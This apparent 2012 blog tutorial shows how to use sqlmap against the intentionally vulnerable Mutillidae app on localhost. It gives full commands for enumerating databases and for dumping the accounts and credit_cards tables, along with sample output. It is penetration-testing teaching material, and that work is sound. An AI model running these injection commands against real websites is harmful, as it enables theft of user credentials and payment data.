Wednesday, May 2, 2012

Dumping mysql DB - sqlmap 101




SQLmap is one of the most common used tools for web application penetration testing because it is open source and automates an sql injection attacks which also allows you to spawn a shell. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB DBMS/ Database Management System. It is also coded in python.

To check all the attributes and options for this tool type sqlmap -h on your terminal.

Suppose we have a vulnerable link after checking it, we append URL target with --dbs to check for the databases:

$ sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' --dbs

After that we should be able to see the back-end DBMS, web server, and most importantly the databases.


Databases enumerated:
[*] dvwa
[*] information_schema
[*] mysql
[*] owasp10

Now let's check all the tables for the owasp10 database. This is the database for the Mutillidae Web Application.

sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 --tables


Tables enumerated:
+------------------------+
| accounts
| blogs_table 
| captured_data
| credit_cards
| hitlog 
| pen_test_tools
+-------------------------+


Now let's try to dump all the columns for the accounts table:
sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T accounts --dump


Right, we got columns cid, mysignature, password and username =)

Similar query: Select * from accounts; 

Now's let's try dumping the credit_cards table:

sqlmap -u 'http://127.0.0.1/mutillidae/index.php?page=user-info.php&username=admin&password=&user-info-php-submit-button=View+Account+Details' -D owasp10 -T credit_cards --dump

Similar query: Select * from credit_cards;
Well, that should be it! I hope you were able to understand how to use sqlmap to dump the tables of a certain database.

No comments:

Post a Comment